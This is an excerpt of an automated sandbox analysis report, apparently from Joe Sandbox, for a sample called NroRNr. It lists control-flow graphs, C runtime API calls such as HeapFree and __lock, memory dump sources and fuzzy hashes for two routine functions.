                                                    control_flow_graph 197 fa35ee-fa35ff call fa264c 200 fa3601-fa3608 197->200 201 fa3676-fa367b call fa2691 197->201 202 fa360a-fa3622 call fa2aa0 call fa45e4 200->202 203 fa364d 200->203 215 fa362d-fa363d call fa3644 202->215 216 fa3624-fa362c call fa4614 202->216 205 fa364e-fa365e HeapFree 203->205 205->201 208 fa3660-fa3675 call fa2c72 GetLastError call fa2c30 205->208 208->201 215->201 222 fa363f-fa3642 215->222 216->215 222->205
                                                    APIs
                                                    • __lock.LIBCMT ref: 00FA360C
                                                      • Part of subcall function 00FA2AA0: __mtinitlocknum.LIBCMT ref: 00FA2AB6
                                                      • Part of subcall function 00FA2AA0: __amsg_exit.LIBCMT ref: 00FA2AC2
                                                      • Part of subcall function 00FA2AA0: EnterCriticalSection.KERNEL32(?,?,?,00FA5600,00000004,00FA9628,0000000C,00FA3746,?,?,00000000,00000000,00000000,?,00FA22F7,00000001), ref: 00FA2ACA
                                                    • ___sbh_find_block.LIBCMT ref: 00FA3617
                                                    • ___sbh_free_block.LIBCMT ref: 00FA3626
                                                    • HeapFree.KERNEL32(00000000,?,00FA9568,0000000C,00FA2A81,00000000,00FA94C8,0000000C,00FA2ABB,?,?,?,00FA5600,00000004,00FA9628,0000000C), ref: 00FA3656
                                                    • GetLastError.KERNEL32(?,00FA5600,00000004,00FA9628,0000000C,00FA3746,?,?,00000000,00000000,00000000,?,00FA22F7,00000001,00000214), ref: 00FA3667
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2714421763-0
                                                    • Opcode ID: 6a96134c789a867bb5f8d95a24f738c331c8c11f2d33d2dc77be70b14a63c3ea
                                                    • Instruction ID: 6167cb8544e29cc843555fa6dbbd275f267e96bedfac49d5c894527704cef6f8
                                                    • Opcode Fuzzy Hash: 6a96134c789a867bb5f8d95a24f738c331c8c11f2d33d2dc77be70b14a63c3ea
                                                    • Instruction Fuzzy Hash: 44016DF2E05309BEDB606FB59C06F5E7AB4AF13770F644019F400A6392DB789A40FA59

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 223 fa3e04-fa3e1f call fa264c call fa2345 228 fa3e43-fa3e6c call fa2aa0 call fa3dc6 call fa3e6e 223->228 229 fa3e21-fa3e25 223->229 237 fa3e2f-fa3e31 228->237 229->228 231 fa3e27-fa3e2c call fa2345 229->231 231->237 239 fa3e3b-fa3e42 call fa2691 237->239 240 fa3e33-fa3e3a call fa1411 237->240 240->239
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00FA3E10
                                                      • Part of subcall function 00FA2345: __getptd_noexit.LIBCMT ref: 00FA2348
                                                      • Part of subcall function 00FA2345: __amsg_exit.LIBCMT ref: 00FA2355
                                                    • __getptd.LIBCMT ref: 00FA3E27
                                                    • __amsg_exit.LIBCMT ref: 00FA3E35
                                                    • __lock.LIBCMT ref: 00FA3E45
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 3521780317-0
                                                    • Opcode ID: c3ef33aefbe29357f99fd59d424752d58559eb1451a740892c195058c993596e
                                                    • Instruction ID: a30fab476d251f2113aa4ef60a043b8caabdcaa88aa044bdfd317def3c1a8817
                                                    • Opcode Fuzzy Hash: c3ef33aefbe29357f99fd59d424752d58559eb1451a740892c195058c993596e
                                                    • Instruction Fuzzy Hash: 3CF06DF2A013058BD7A0EB78884674D72A0AF4B720F114159B44197291CB7C9A06FA52